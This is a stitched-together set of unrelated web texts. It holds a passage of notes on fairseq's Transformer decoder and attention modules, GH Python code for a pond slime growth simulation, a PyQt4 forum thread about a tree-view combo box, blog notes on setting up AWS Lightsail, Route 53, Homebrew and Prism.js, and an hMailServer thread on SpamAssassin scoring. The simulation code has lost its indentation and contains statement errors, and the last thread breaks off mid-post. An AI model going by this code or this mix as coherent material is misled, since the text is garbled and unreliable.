    # Notice the incremental_state argument - used to pass in states
    # from earlier timesteps
    def forward(self, prev_output_tokens, encoder_out=None, incremental_state=None, **kwargs): ...

    # Similar to forward(), but only returns the features
    def extract_features(self, prev_output_tokens, encoder_out=None, incremental_state=None, **kwargs): ...

    # reorder incremental state according to new order (see the reading [4] for an
    # example of how this method is used in beam search)
    def reorder_incremental_state(self, incremental_state, new_order): ...

    def set_beam_size(self, beam_size): ...
Notice this class has a decorator @with_incremental_state, which adds another base class: FairseqIncrementalState. This class provides get/set functions for the incremental states. These states are stored in a dictionary. Each class has a uuid, and the states for this class are keyed by it, separated by a dot (.). A nice reading on incremental state can be found here [4].
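Conceptually, that get/set mechanism behaves roughly like this (a simplified sketch, not the fairseq implementation; names are illustrative):
import uuid

class IncrementalStateSketch:
    def __init__(self):
        # each module instance gets its own uuid so keys from different modules never collide
        self._id = str(uuid.uuid4())

    def set_state(self, incremental_state, key, value):
        # store the value under "<module-uuid>.<key>"
        incremental_state[self._id + "." + key] = value

    def get_state(self, incremental_state, key):
        return incremental_state.get(self._id + "." + key)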
The TransformerDecoder defines the following methods:
class TransformerDecoder(FairseqIncrementalDecoder):
    # Similar to TransformerEncoder::__init__
    def __init__(self, args, dictionary, embed_tokens, no_encoder_attn=False): ...

    # Wraps over extract_features()
    def forward(...): ...

    # Applies feed forward functions to encoder output. See below discussion
    def extract_features(
        prev_output_tokens,
        encoder_out,
        incremental_state,
        full_context_alignment,
        alignment_layer,
        alignment_heads,
    ): ...

    # Convert from feature size to vocab size.
    def output_layer(self, features): ...

    def max_positions(self): ...

    # Retrieves whether the mask for future tokens is buffered in the class
    def buffered_future_mask(self, tensor): ...

    def upgrade_state_dict_named(self, state_dict, name): ...
extract_features applies feed-forward methods to the encoder output, following some other features mentioned in [5]. In particular:
The decoder may use the average of the attention heads as the attention output.
The argument may specify alignment_heads to only average over this many heads. This is an auto-regressive mask feature introduced in the paper.
TransformerDecoderLayer
A TransformerDecoderLayer defines a sublayer used in a TransformerDecoder. In accordance with TransformerDecoder, this module needs to handle the incremental state introduced in the decoder step. It sets the incremental state on the MultiheadAttention module. Different from the TransformerEncoderLayer, this module has a new attention sublayer called the encoder-decoder attention layer. This feature is also implemented inside the MultiheadAttention module. See [4] for a visual structure of a decoder layer.
A TransformerDecoderLayer is defined as:
class TransformerDecoderLayer(nn.Module):
    # set up components required for forward
    def __init__(
        self, args, no_encoder_attn=False, add_bias_kv=False, add_zero_attn=False
    ): ...

    # Required when running the model on an onnx backend.
    def prepare_for_onnx_export_(self): ...

    def forward(
        self,
        x,
        encoder_out,
        encoder_padding_mask,
        incremental_state,
        prev_self_attn_state,
        prev_attn_state,
        self_attn_mask,
        self_attn_padding_mask,
        need_attn,
        need_head_weights,
    ): ...
Compared to TransformerEncoderLayer, the decoder layer takes more arguments, since a decoder layer has two attention layers rather than the single one in an encoder layer. The prev_self_attn_state and prev_attn_state arguments specify those states from a previous time step. The need_attn and need_head_weights arguments specify whether the internal weights from the two attention layers should be returned, and whether the weights from each head should be returned independently.
Among the TransformerEncoderLayer and the TransformerDecoderLayer, the most important component is the MultiheadAttention sublayer. Let's take a look at how this layer is designed.
MultiheadAttention
Note: according to Myle Ott, a replacement plan for this module is on the way. My assumption is they may separately implement the MHA used in an Encoder from that used in a Decoder.
The methods implemented in this class:
@with_incremental_state
class MultiheadAttention(nn.Module):
    def __init__(...): ...

    # Applies Xavier parameter initialization
    def reset_parameters(self): ...

    # See discussion below
    def forward(
        self,
        query,
        key,
        value,
        key_padding_mask,
        incremental_state,
        need_weights,
        static_kv,
        attn_mask,
        before_softmax,
        need_head_weights,
    ) -> Tuple[Tensor, Optional[Tensor]]: ...

    # concatenate key_padding_mask from the current time step to the previous
    # time step. Required for incremental decoding.
    @staticmethod
    def _append_prev_key_padding_mask() -> Optional[Tensor]: ...

    # reorder incremental state according to new_order vector
    # Not used??
    def reorder_incremental_state(): ...

    # _input_buffer includes states from a previous time step,
    # saved to 'attn_state' in its incremental state
    def _get_input_buffer() -> Dict[str, Optional[Tensor]]: ...

    def _set_input_buffer(): ...

    # Empty hook for internal use
    def apply_sparse_mask(attn_weights, tgt_len: int, src_len: int, bsz: int): ...

    def upgrade_state_dict_named(self, state_dict, name): ...
The forward method defines the feed-forward operations applied in a multi-head attention sublayer. Notice that query is the input, and key and value are optional arguments if the user wants to specify those matrices (for example, in an encoder-decoder attention sublayer). In a regular self-attention sublayer, they are initialized with a simple linear layer. key_padding_mask specifies which keys are pads.
There is an option to switch between Fairseq implementation of the attention layer to that of Pytorch.
Miscellaneous
LayerNorm is a module that wraps over the backends of the Layer Norm [7] implementation. It dynamically determines whether the runtime has apex available or not in order to return the suitable implementation.
PositionalEmbedding is a module that wraps over two different implementations of adding time information to the input embeddings. They are SinusoidalPositionalEmbedding and LearnedPositionalEmbedding. See [6] section 3.5.
References and Readings
Extending Fairseq: https://fairseq.readthedocs.io/en/latest/overview.html
Visual understanding of Transformer model. http://jalammar.github.io/illustrated-transformer/
Reducing Transformer Depth on Demand with Structured Dropout https://arxiv.org/abs/1909.11556
Reading on incremental decoding: http://www.telesens.co/2019/04/21/understanding-incremental-decoding-in-fairseq/#Incremental_Decoding_during_Inference
Jointly Learning to Align and Translate with Transformer Models: https://arxiv.org/abs/1909.02074
Attention is all You Need: https://arxiv.org/abs/1706.03762
Layer Norm: https://arxiv.org/abs/1607.06450
|
Maruyama’s Pond Slime
Coursework for Design Computation II
Implementation of Maruyama's pond slime algorithm in both 2D and 3D using Rhino and GH Python. A simple cell-based algorithm for simulating pond slime growth using the following rules:
1. If there are more than or equal to four cells in a straight line by the active cell, make a left turn, then a right one.
2. If unblocked and there are less than or equal to four cells in the same line, active cells grow straight. If an active cell hits the boundary, make a turn in the last turning direction.
3. If blocked by itself, make a left turn.
4. If blocked by others, make a right turn.
The 3d simulation appends the following modifications:
1. Cells may navigate on the XY, XZ, and YZ planes. A cell can only turn on planes that are not perpendicular to its moving direction.
2. A cell turns left or right following the original algorithm. At each turn, it picks a plane at random.
Program: Design Computation
Date: 2018
Demonstration of simulation.
GH Python Code:
__author__ = "Vincent Mai"
__version__ = "2018.11.10"
"""
Design Computation II
Maruyama's Pond Slime 2D
"""
import random
import ghpythonlib.treehelpers as th
# GH data input:
n = num
rows, cols = size, size
class Slime(object):
def __init__(self):
self.locs = set() # a set of location the slime occupies
self.frontiers = [] # stores two activeCells
self.active = True
self.color = (random.randint(0, 255),
random.randint(0, 255),
random.randint(0, 255))
def initCells(self, emptyGrid):
"""
initialize the first two cells of slime
"""
loc1 = random.sample(emptyGrid, 1)[0]
loc2Options = []
for d in [(1, 0), (-1, 0), (0, -1), (0, 1)]:
option = (loc1[0]+d[0], loc1[1]+d[1])
if option in emptyGrid: loc2Options.append(option)
loc2 = random.choice(loc2Options)
dir1, dir2 = (loc1[0]-loc2[0], loc1[1]-loc2[1]),
(loc2[0]-loc1[0], loc2[1]-loc1[1])
cell1 = ActiveCell(loc1, dir1)
cell2 = ActiveCell(loc2, dir2)
self.frontiers += [cell1, cell2]
self.update(emptyGrid)
def update(self, emptyGrid):
"""
update slime occupied locations and emptygrid cells
"""
self.locs |= {self.frontiers[0].loc, self.frontiers[1].loc}
emptyGrid -= self.locs
if not self.frontiers[0].active and not self.frontiers[1].active:
self.active = False
def grow(self, emptyGrid):
"""
grow slime if cells in frontiers are active
"""
for cell in self.frontiers:
if cell.active == True:
cell.turn(self.locs, emptyGrid, boundaryGrid)
nextCell = cell.getNextCell()
if nextCell not in emptyGrid:
cell.active = False
else:
cell.loc = nextCell
cell.curLen += 1
self.update(emptyGrid)
class ActiveCell(object):
def __init__(self, location, direction):
self.loc = location
self.dir = direction
self.curTurn = 'left'
self.curLen = 3 # length of current line
self.active = True
def getNextCell(self):
"""
return the next potential cell to grow to
"""
nextCell = (self.loc[0]+self.dir[0], self.loc[1]+self.dir[1])
return nextCell
def changeDir(self, turn):
"""
update direction as specified by turn
"""
if turn == 'left':
self.dir = (-self.dir[1], self.dir[0])
elif turn == 'right':
self.dir = (self.dir[1], -self.dir[0])
def turn(self, slimeLocs, emptyGrid, boundaryGrid):
"""
turn based on the next cell encountered
"""
nextCell = self.getNextCell()
if nextCell in emptyGrid:
if self.curLen >= 4 and self.curTurn == 'left':
self.changeDir(self.curTurn)
self.curTurn = 'right'
self.curLen = 1
elif self.curLen >= 4 and self.curTurn == 'right':
self.changeDir(self.curTurn)
self.curTurn = 'left'
self.curLen = 1
if nextCell not in boundaryGrid:
self.changeDir(self.curTurn)
self.curLen = 1
elif nextCell in slimeLocs:
self.changeDir('left')
self.curTurn == 'left'
self.curLen = 1
elif nextCell not in emptyGrid:
self.changeDir('right')
self.curTurn == 'right'
self.curLen = 1
if reset:
# generate grid
boundaryGrid = set((row, col) for row in range(rows) for col in range(cols))
emptyGrid = set((row, col) for row in range(rows) for col in range(cols))
random.seed(0)
slimeList = []
colorsList = []
branchesList = []
indicesList = []
for i in range(n):
newSlime = Slime()
newSlime.initCells(emptyGrid)
slimeList.append(newSlime)
else:
branchesList = []
indicesList = []
colorsList = []
for slime in slimeList:
slime.grow(emptyGrid)
branchesList.append([e[0] for e in slime.locs])
indicesList.append([e[1] for e in slime.locs])
colorsList.append(str(slime.color))
branches = th.list_to_tree(branchesList)
indices = th.list_to_tree(indicesList)
color = th.list_to_tree(colorsList)
__author__ = "Vincent Mai"
__version__ = "2018.11.10"
"""
Design Computation II
Maruyama's Pond Slime 3D
"""
import random
import ghpythonlib.treehelpers as th
# GH data input:
n = num
rows, cols, heis = size, size, size
class Slime(object):
def __init__(self):
self.locs = set() # a set of location the slime occupies
self.frontiers = [] # stores two activeCells
self.active = True
self.color = (random.randint(0, 255),
random.randint(0, 255),
random.randint(0, 255))
def initCells(self, emptyGrid):
"""
initialize the first two cells of slime
"""
loc1 = random.sample(emptyGrid, 1)[0]
loc2Options = []
for d in [(1, 0, 0), (-1, 0, 0), (0, -1, 0),
(0, 1, 0), (0, 0, 1), (0, 0, -1)]:
option = (loc1[0]+d[0], loc1[1]+d[1], loc1[2]+d[2])
if option in emptyGrid: loc2Options.append(option)
loc2 = random.choice(loc2Options)
dir1, dir2 = (loc1[0]-loc2[0], loc1[1]-loc2[1], loc1[2]-loc2[2]),
(loc2[0]-loc1[0], loc2[1]-loc1[1], loc2[2]-loc1[2])
plane1, plane2 = random.choice(ActiveCell.getPlanes(dir1)),
random.choice(ActiveCell.getPlanes(dir2))
cell1 = ActiveCell(loc1, dir1, plane1)
cell2 = ActiveCell(loc2, dir2, plane2)
self.frontiers += [cell1, cell2]
self.update(emptyGrid)
def update(self, emptyGrid):
"""
update slime occupied locations and emptygrid cells
"""
self.locs |= {self.frontiers[0].loc, self.frontiers[1].loc}
emptyGrid -= self.locs
if not self.frontiers[0].active and not self.frontiers[1].active:
self.active = False
def grow(self, emptyGrid):
"""
grow slime if cells in frontiers are active
"""
for cell in self.frontiers:
if cell.active == True:
cell.turn(self.locs, emptyGrid, boundaryGrid)
nextCell = cell.getNextCell()
if nextCell not in emptyGrid:
cell.active = False
else:
cell.loc = nextCell
cell.curLen += 1
self.update(emptyGrid)
class ActiveCell(object):
def __init__(self, location, direction, plane):
self.loc = location
self.dir = direction
self.curTurn = 'left'
self.curPlane = plane
self.curLen = 3 # length of current line
self.active = True
@staticmethod
def getPlanes(dir):
"""
return all possible planes from a given direction
planes should not be perpendicular to direction
"""
allPlanes = ('yzPlane', 'xzPlane', 'xyPlane')
planes = []
for i in range(len(dir)):
if dir[i] == 0:
planes.append(allPlanes[i])
return planes
def getNextCell(self):
"""
return the next potential cell to grow to
"""
nextCell = (self.loc[0]+self.dir[0], self.loc[1]+self.dir[1],
self.loc[2]+self.dir[2])
return nextCell
def changeDir(self, turn, plane):
"""
update direction as specified by turn
in 3D the turns are left, and the plane
on which the slime is currently growing
"""
if plane == 'xyPlane':
if turn == 'left':
self.dir = (-self.dir[1], self.dir[0], self.dir[2])
elif turn == 'right':
self.dir = (self.dir[1], -self.dir[0], self.dir[2])
if plane == 'xzPlane':
if turn == 'left':
self.dir = (-self.dir[2], self.dir[1], self.dir[0])
elif turn == 'right':
self.dir = (self.dir[2], self.dir[1], -self.dir[0])
if plane == 'yzPlane':
if turn == 'left':
self.dir = (self.dir[0], -self.dir[2], self.dir[1])
elif turn == 'right':
self.dir = (self.dir[0], self.dir[2], -self.dir[1])
def turn(self, slimeLocs, emptyGrid, boundaryGrid):
"""
turn based on the next cell encountered
"""
nextCell = self.getNextCell()
if nextCell in emptyGrid and self.curLen >= 4:
self.changeDir(self.curTurn, self.curPlane)
self.curPlane = random.choice(ActiveCell.getPlanes(self.dir))
if self.curTurn == 'left':
self.curTurn = 'right'
self.curLen = 1
elif self.curTurn == 'right':
self.curTurn = 'left'
self.curLen = 1
if nextCell not in boundaryGrid:
self.changeDir(self.curTurn, self.curPlane)
self.curPlane = random.choice(ActiveCell.getPlanes(self.dir))
self.curLen = 1
elif nextCell in slimeLocs:
self.changeDir('left', self.curPlane)
self.curPlane = random.choice(ActiveCell.getPlanes(self.dir))
self.curTurn == 'left'
self.curLen = 1
elif nextCell not in emptyGrid:
self.changeDir('right', self.curPlane)
self.curPlane = random.choice(ActiveCell.getPlanes(self.dir))
self.curTurn == 'right'
self.curLen = 1
if reset:
# generate grid
boundaryGrid = set((row, col, hei) for row in range(rows)
for col in range(cols)
for hei in range(heis))
emptyGrid = set((row, col, hei) for row in range(rows)
for col in range(cols)
for hei in range(heis))
random.seed(0)
slimeList = []
colorsList = []
rowsList = []
colsList = []
heisList = []
for i in range(n):
newSlime = Slime()
newSlime.initCells(emptyGrid)
slimeList.append(newSlime)
else:
rowsList = []
colsList = []
heisList = []
colorsList = []
for slime in slimeList:
slime.grow(emptyGrid)
rowsList.append([e[0] for e in slime.locs])
colsList.append([e[1] for e in slime.locs])
heisList.append([e[2] for e in slime.locs])
colorsList.append(str(slime.color))
x = th.list_to_tree(rowsList)
y = th.list_to_tree(colsList)
z = th.list_to_tree(heisList)
color = th.list_to_tree(colorsList)
|
Getting the ordinal number in a QTreeView, with and without a parent
poluna
16.12.2015, 12:36
Post #11
Now I understand you.
That option isn't bad, and it actually seems even simpler to implement.
OK, I'm withdrawing the question for now. I know how to implement it!
lanz
16.12.2015, 12:44
Post #12
Quote
"out-of-model" tree
Oh no, don't listen to him, he'll teach you bad habits!
In principle, the model in the combobox and the model in the tree on the left should be one and the same model.
Therefore an index from one should fit an index from the other.
I.e. you first get the selected index from the tree
(call it idx)
then in the combobox you do
combo->setRootModelIndex(idx.parent())
combo->setCurrentIndex(idx.row())
http://doc.qt.io/qt-4.8/qcombobox.html#setRootModelIndex
http://doc.qt.io/qt-4.8/qcombobox.html#currentIndex-prop
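(In PyQt4 terms, the suggestion above looks roughly like this - a sketch assuming both widgets have been given the same model and that combo and tree are the two widgets:)
# both widgets share one model
combo.setModel(model)
tree.setModel(model)

def syncComboToTree(current, previous):
    # current is the QModelIndex selected in the tree
    combo.setRootModelIndex(current.parent())
    combo.setCurrentIndex(current.row())

tree.selectionModel().currentChanged.connect(syncComboToTree)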
Алексей1153
16.12.2015, 13:00
Post #13
lanz, sure, you can store it in the model too, but I don't like doing it that way, it's just inconvenient )) lanz, generally speaking, that's what happens anyway - there's no contradiction, but some operations are more convenient to perform on your own container.
And in this case your variant will be better, of course )
This post was edited by
Алексей1153 - 16.12.2015, 13:08
ViGOur
16.12.2015, 13:27
Post #14
In my opinion Алексей1153 suggested a good approach; I use something similar myself.
There is a list (QList) or a tree (QMap) that gets loaded from somewhere and that is displayed in the model. It's very convenient to add, edit, and delete. And the model is an abstraction; in principle it shouldn't store the data itself, just like the view.
lanz, it was said above:
"I have a TreeComboBox class; as you can guess from the name, I have a QTreeView inside the QComboBox."
And as I understand it, your method is perfect for a plain QComboBox, but not for the subclassed one. Let's wait for the author and see what she says!
poluna - 16.12.2015, 13:34 (post #15)
lanz, if a tree can be shown in a combo box using standard means, then your method will work, but I couldn't manage it.
As I understand it, to show a tree in a combo box you have to subclass it; I did it like this:
#! /usr/bin/python
# -*- coding: UTF-8 -*-
from PyQt4 import QtCore, QtGui
class TreeComboBox(QtGui.QComboBox):
    def __init__(self, parent=None):
        super(QtGui.QComboBox, self).__init__(parent)
        self._skipNextHide = False
        self._treeView = QtGui.QTreeView(self)
        self.setView(self._treeView)
        self._treeView.header().hide()
        self._treeView.viewport().installEventFilter(self)

    def eventFilter(self, object, event):
        if event.type() == QtCore.QEvent.MouseButtonPress and object == self.view().viewport():
            index = self.view().indexAt(event.pos())
            if not self.view().visualRect(index).contains(event.pos()):
                self._skipNextHide = True
        return False

    def showPopup(self):
        self.setRootModelIndex(QtCore.QModelIndex())
        self._treeView.expandAll()
        QtGui.QComboBox.showPopup(self)

    def hidePopup(self):
        self.setRootModelIndex(self.view().currentIndex().parent())
        self.setCurrentIndex(self.view().currentIndex().row())
        if self._skipNextHide:
            self._skipNextHide = False
        else:
            QtGui.QComboBox.hidePopup(self)
If I'm wrong I'll only be glad - a whole pile of problems would disappear at once!
But for now I don't know how!
lanz - 16.12.2015, 14:53 (post #16)
poluna, well, your code seems to work as it should for me - what am I doing wrong?
I changed hidePopup a little so that it doesn't reset everything straight away:
def hidePopup(self):
    if self._skipNextHide:
        self._skipNextHide = False
    else:
        self.setRootModelIndex(self.view().currentIndex().parent())
        self.setCurrentIndex(self.view().currentIndex().row())
        QtGui.QComboBox.hidePopup(self)
poluna - 16.12.2015, 16:06 (post #17)
That's it, I've got it - everything works!
Here is a working example, also in Python:
#! /usr/bin/python
# -*- coding: UTF-8 -*-
import sys
from PyQt4 import QtCore, QtGui
class TreeComboBox(QtGui.QComboBox):
    def __init__(self, parent=None):
        super(QtGui.QComboBox, self).__init__(parent)
        self._skipNextHide = False
        self._treeView = QtGui.QTreeView(self)
        self.setView(self._treeView)
        self._treeView.header().hide()
        self._treeView.viewport().installEventFilter(self)

    def eventFilter(self, object, event):
        if event.type() == QtCore.QEvent.MouseButtonPress and object == self.view().viewport():
            index = self.view().indexAt(event.pos())
            if not self.view().visualRect(index).contains(event.pos()):
                self._skipNextHide = True
        return False

    def showPopup(self):
        self.setRootModelIndex(QtCore.QModelIndex())
        self._treeView.expandAll()
        QtGui.QComboBox.showPopup(self)

    def hidePopup(self):
        if self._skipNextHide:
            self._skipNextHide = False
        else:
            self.setRootModelIndex(self.view().currentIndex().parent())
            self.setCurrentIndex(self.view().currentIndex().row())
            QtGui.QComboBox.hidePopup(self)


class Main(QtGui.QWidget):
    def __init__(self, parent=None):
        QtGui.QWidget.__init__(self, parent)
        self._comboBox = TreeComboBox(self)
        self._treeView = QtGui.QTreeView(self)
        layout = QtGui.QVBoxLayout()
        layout.addWidget(self._comboBox)
        layout.addWidget(self._treeView)
        self.setLayout(layout)
        model = QtGui.QStandardItemModel()
        for a in range(3):
            i = QtGui.QStandardItem('Item ' + str(a))
            for b in range(3):
                ii = QtGui.QStandardItem('sub 1 Item ' + str(b))
                i.setChild(b, ii)
                for c in range(3):
                    iii = QtGui.QStandardItem('sub 2 Item ' + str(c))
                    ii.setChild(c, iii)
            model.appendRow(i)
        self._comboBox.setModel(model)
        self._treeView.setModel(model)
        self.connect(self._treeView, QtCore.SIGNAL("clicked(const QModelIndex&)"), self.comboSelect)

    def comboSelect(self, idx):
        self._comboBox.setRootModelIndex(idx.parent())
        self._comboBox.setCurrentIndex(idx.row())


if __name__ == "__main__":
    app = QtGui.QApplication(sys.argv)
    main = Main()
    main.show()
    sys.exit(app.exec_())
lanz, thank you so much!
|
I'm going to register the domain this blog will use.
At the moment this has turned into a blog about building a blog, but I want to make data analysis the main topic soon, so I'll pick a domain name that fits that.
I want to consolidate as much management as possible in AWS, so rather than a registrar like お名前.com, I'll register it with Amazon Route 53.
The official documentation is here:
Registering a new domain
Steps
Sign in to the AWS Management Console
Open the Route 53 console
Under [Domain Registration], choose [Get Started Now]
Click [Register Domain]
Enter the domain you want to register under "Choose a domain name"
Press "check" and confirm that it can be registered (Status is Available)
Click [Add to Cart]
Select the number of years to register for
Click [Continue]
Enter your details under Registrant Contact
Click [Continue]
Check "I have read and agree to the AWS Domain Name Registration Agreement"
Click [Complete Purchase]
Domain registration can apparently take up to three days to complete.
(Domain registration might take up to three days to complete.)
On the domain list screen, the Status showed "Domain registration in progress".
A few minutes later a confirmation email arrived at the address I entered, so I clicked the link inside and am now waiting.
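As an aside, the availability check can also be done from code. This is just a rough sketch of mine using boto3 (not part of the original walkthrough); it assumes AWS credentials are already configured and uses a made-up domain name:

# Sketch: check whether a domain can be registered via Route 53 Domains.
import boto3

# The Route 53 Domains API is served from us-east-1.
client = boto3.client("route53domains", region_name="us-east-1")
resp = client.check_domain_availability(DomainName="example-data-blog.com")
print(resp["Availability"])  # e.g. "AVAILABLE" or "UNAVAILABLE"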
The title says MacBook, but the steps should be the same on a desktop Mac.
Incidentally, I use a MacBook Pro for my day-to-day analysis work.
The procedure is simple: just run the command from the official site in a terminal.
I'll copy the command here too, but copying it from the official site is more reliable.
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
On a Mac, both mecab and pyenv are easy to install with Homebrew.
The bottom-right corner of the blog looked peeled back, showing the Bitnami banner, so I removed it.
The official manual's method is here:
Remove The Bitnami Banner
Log in to the server over SSH and run the following commands to change the setting and restart the server.
Where the official documentation says APPNAME, that is wordpress in this case.
sudo /opt/bitnami/apps/wordpress/bnconfig --disable_banner 1
sudo /opt/bitnami/ctlscript.sh restart apache
Since I expect to write more posts containing code, I set up a syntax highlighter.
There seem to be various ways to do this, but I went with prism.js, which had comparatively good reviews among what I found.
Official site
Installing Prism.js
There is a WordPress plugin called Prism For WP, so I installed and activated it.
In the settings screen I checked the languages I plan to use (Python and so on).
"Markup" apparently means HTML.
Since I will probably use line numbers too, I also checked Line Numbers under Select Plugins.
Enabling Normalize Whitespace is said to remove unnecessary leading whitespace on the first line.
Using Prism.js
Wrap the source code in pre and code tags, set the pre tag's class to line-numbers, and the code tag's class to language-x (where x is the language name).
Example used with HTML
<pre class="line-numbers"><code class="language-markup">
Write your HTML source code here
</code></pre>
For Python, use language-python. An example I tried:
The code written in the post
<pre class="line-numbers"><code class="language-python">
a, b = 0, 1
for _ in range(10):
    a, b = b, a + b
    print(b)
</code></pre>
Rendered result
a, b = 0, 1
for _ in range(10):
    a, b = b, a + b
    print(b)
By the way, the sample program prints the Fibonacci sequence.
Essentially these are my notes from when I set up the server for this blog.
Until I have a reasonable number of posts I'm not thinking about traffic or SEO, so for the first few days it's running without a domain.
Official documentation
The procedure is simple to begin with and the documents above are easy to follow, so I finished the work with almost no confusion.
Server creation steps (a scripted equivalent is sketched just after this list)
Log in to the AWS console
Select Lightsail under Compute in the list of all services
On the Instances tab, click the [Create instance] button
Confirm the instance location (Tokyo)
On the instance image selection screen, choose the following:
Linux/Unix
Apps + OS
wordpress
Choose an instance plan (this time I picked the cheapest one)
Give the instance a name
Click the [Create instance] button
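The same instance creation can be scripted. This is only a sketch of mine with boto3, not part of the original notes; the instance name is a placeholder, and the availability zone, blueprint ID and bundle ID are assumptions that should be checked against get_blueprints() / get_bundles():

# Sketch: create a Lightsail WordPress instance from code.
import boto3

client = boto3.client("lightsail", region_name="ap-northeast-1")
client.create_instances(
    instanceNames=["my-blog"],            # placeholder name
    availabilityZone="ap-northeast-1a",   # Tokyo
    blueprintId="wordpress",              # the "Apps + OS" WordPress image
    bundleId="nano_2_0",                  # assumed to be the cheapest plan
)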
Static IP creation steps
In the Lightsail console, select the Networking tab
Click the Create static IP button
Choose the Lightsail resource to attach the static IP to
Name the static IP and click [Create]
Access and login
Selecting the created instance on the Lightsail home screen shows the IP address you created.
Entering that IP address in the browser's URL bar brings up your own WordPress site.
You can also connect to the server over SSH in the browser from the Lightsail home screen.
Alternatively, you can download the SSH key from the account menu at the top right of Lightsail and connect with that.
Once connected over SSH, there is a file in the home directory called
bitnami_application_password
which contains the login password.
Incidentally, the username is user.
Unrelated, but when I previously set up Redmine on Lightsail I struggled because I couldn't find the initially generated username.
Nice to meet you. My name is Yutaro.
I have just launched this new blog.
The main purpose of the blog is to have a place to collect the things I look into for work or out of interest.
What I research day to day for work and hobbies is scattered all over the place, so I want to consolidate it here.
(Two PCs at home, a personal server, the PC and server at work, paper notebooks, and so on.)
There are also smaller reasons, such as wanting to try WordPress and wanting an environment where I can experiment with Google Analytics on my own.
For a while the main content will probably be copies of notes I wrote elsewhere and the work I did to set up this blog, but I intend to gradually publish properly useful content, so thank you for reading.
Brief career history
After completing a master's degree in mathematics at a regional national university, I have worked at the following three companies in three different roles:
Company 1: Front-end SE for financial-sector clients at a major electronics manufacturer
Company 2: Engineer at a web production company serving medical institutions (managed a development subsidiary in China)
Company 3 (current): Data scientist at a web services company
|
Is it intended behavior that hMailServer will not add the SpamAssassin score to its own score unless the SpamAssassin score is greater than or equal to the SpamAssassin spam threshold (i.e., SpamAssassin tags it as spam)? I've seen some discussions on this and it is eventually just dropped and the people usually just lower their SpamAssassin threshold score to make hMailServer always add the scores together (thus making SpamAssassin tag virtually everything as spam). It seems more logical to always add the scores together (or at least give us the option). Is this by design or is it a bug? Are there people who actually want it to work that way it currently is?
Thanks,
Chad
If SpamAssassin tags mail as spam, does that change the message?
(I don't use SpamAssassin)
I'm also guessing that the spam score may NOT be relayed to hMailserver by SpamAssassin unless the message is marked as SPAM
When SpamAssassin scores it above the configured threshold, it will add an X-Spam-Status: YES header (along with other informative headers). I downloaded the hMailServer source code and verified that it does not store the SpamAssassin score (and thus pass it back up to main spam handling routine) unless it finds the X-Spam-Status: YES header. Unless most people really like this behavior, I propose that it always count the score regardless of the X-Spam-Status value. In fact, I feel like that is the whole point of scoring....you keep testing and keep adding up scores until your ultimate threshold is reached. In my particular case, SpamAssassin gives a score of 4.9 (where 5.0 is the SpamAssassin threshold) and then hMailServer failed the SPF test which I score as 5. The total score should have been 9.9, but hMailServer just scored it as 5. My delete threshold is 9, so the mail should have been deleted but it wasn't.
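To make the two behaviours concrete, here is a toy sketch (an illustration only, not hMailServer's actual code) of "gated" versus "additive" combination of the SpamAssassin score with hMailServer's own tests, using the numbers from the example above:

# Toy illustration only - not hMailServer source code.
def combined_score(sa_score, sa_threshold, hms_score, additive=False):
    if additive:
        # always count the SpamAssassin score
        return sa_score + hms_score
    # behaviour described above: only count SA's score when SA itself
    # marked the message as spam (X-Spam-Status: YES)
    return (sa_score if sa_score >= sa_threshold else 0) + hms_score

# Numbers from the example: SA scores 4.9 (threshold 5.0), HMS SPF test adds 5.
print(combined_score(4.9, 5.0, 5))                 # 5   -> below a delete threshold of 9
print(combined_score(4.9, 5.0, 5, additive=True))  # 9.9 -> above the delete threshold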
So if you had set your SpamAssassin score at 1, the actual score value would have been passed, and the message rejected.
From what you are saying, the downside to setting the SpamAssassin mark score to 1 is that some mail that doesn't reach the hMailServer spam score will contain a SpamAssassin header showing a SpamAssassin score?
Is that such a big deal?
In my opinion I can't see why you would want to add the SA score unless SA has deemed it potential spam.
By using SA you are trusting it and its rules to make a judgement: as per your SA configuration, a mail is either deemed as spam or it is deemed as safe.
You know that SA rules add scores in decimals and as negatives, such as
0.7
-0.2
0.5
1.3
-1.3
and as such it collectively determines its spam value. Furthermore it does this because the rules and its abilities are FAR MORE advanced than anything HMS does internally.
Using the SA score is only appropriate when you think SA may have determined it as spam (I have the threshold set at 3, which seems to be just right) and yet you want to not FULLY trust it and add HMS tests on top of it too. I.e., maybe SA scores 3.1 (determining it as SPAM), and you have your own HMS threshold set to something higher (5 or 6) allowing for your own HMS tests. Of course this HMS test scoring is probably not as fine-tuned as the SA scoring rules, so it is more brute force.
The alternative you are proposing is to say that even though SA thinks a mail is not spam (because it only scored 1.0), you are going to use this '1' and add it to your own HMS tests; well, what happens if the SA 'HELO' test gives a score of 1, and then you run the HMS 'HELO' test scoring 4 (the same test, yet scored twice)? You now deem your mail as spam (achieving 5) when in reality neither SA nor HMS has REALLY found it to be spam at all. Whereas using the existing method the mail, even though it is being tested twice for the same condition, still isn't deemed as spam (SA scores it 1.0, HMS scores it 4 - and yet your HMS score threshold is 5).
My point is that it is right in my mind to perform the way it does (only when SA considers it as spam) when you have already decided to trust SA's decision making and judgement.
jimimaseye wrote: Furthermore it does this because the rules and its abilities are FAR MORE advanced than any HMS does internally.
Agreed.
Thinking about this, I'd expect that the SpamAssassin score was added irrespective of whether SpamAssassin marked the message as SPAM or not. (How else could the negative values be useful?) That's certainly how the GUI looks.
I'd think that NOT doing that is a bug, and that this should be added to the issue tracker at https://github.com/hmailserver/hmailserver/issues
To give you an idea Matt, a typical SpamAssassin header is added regardless and looks like this:
Code: Select all
X-Spam-Status: No, score=0.3 required=3.0 tests=BAYES_00,
DYN_RDNS_AND_INLINE_IMAGE,HTML_MESSAGE,RDNS_DYNAMIC,SPF_PASS,
T_KAM_HTML_FONT_INVALID autolearn=no autolearn_force=no version=3.4.0
X-Spam-Report:
* -0.0 SPF_PASS SPF: sender matches SPF record
* 0.0 T_KAM_HTML_FONT_INVALID BODY: Test for Invalidly Named or Formatted
* Colors in HTML
* -1.9 BAYES_00 BODY: Bayes spam probability is 0 to 1%
* [score: 0.0000]
* 0.0 HTML_MESSAGE BODY: HTML included in message
* 1.0 RDNS_DYNAMIC Delivered to internal network by host with
* dynamic-looking rDNS
* 1.2 DYN_RDNS_AND_INLINE_IMAGE Contains image, and was sent by dynamic
* rDNS
*
where everything from "tests=" onward are the names of all the rules that were applied and scored due to matching. The spam 'report' then lists the tests individually with their scores.
Now, this is a good example: given that this particular report scored an overall 0.3, how would you have HMS take that score (as it only deals with integer scores)?
And here is another example:
Code: Select all
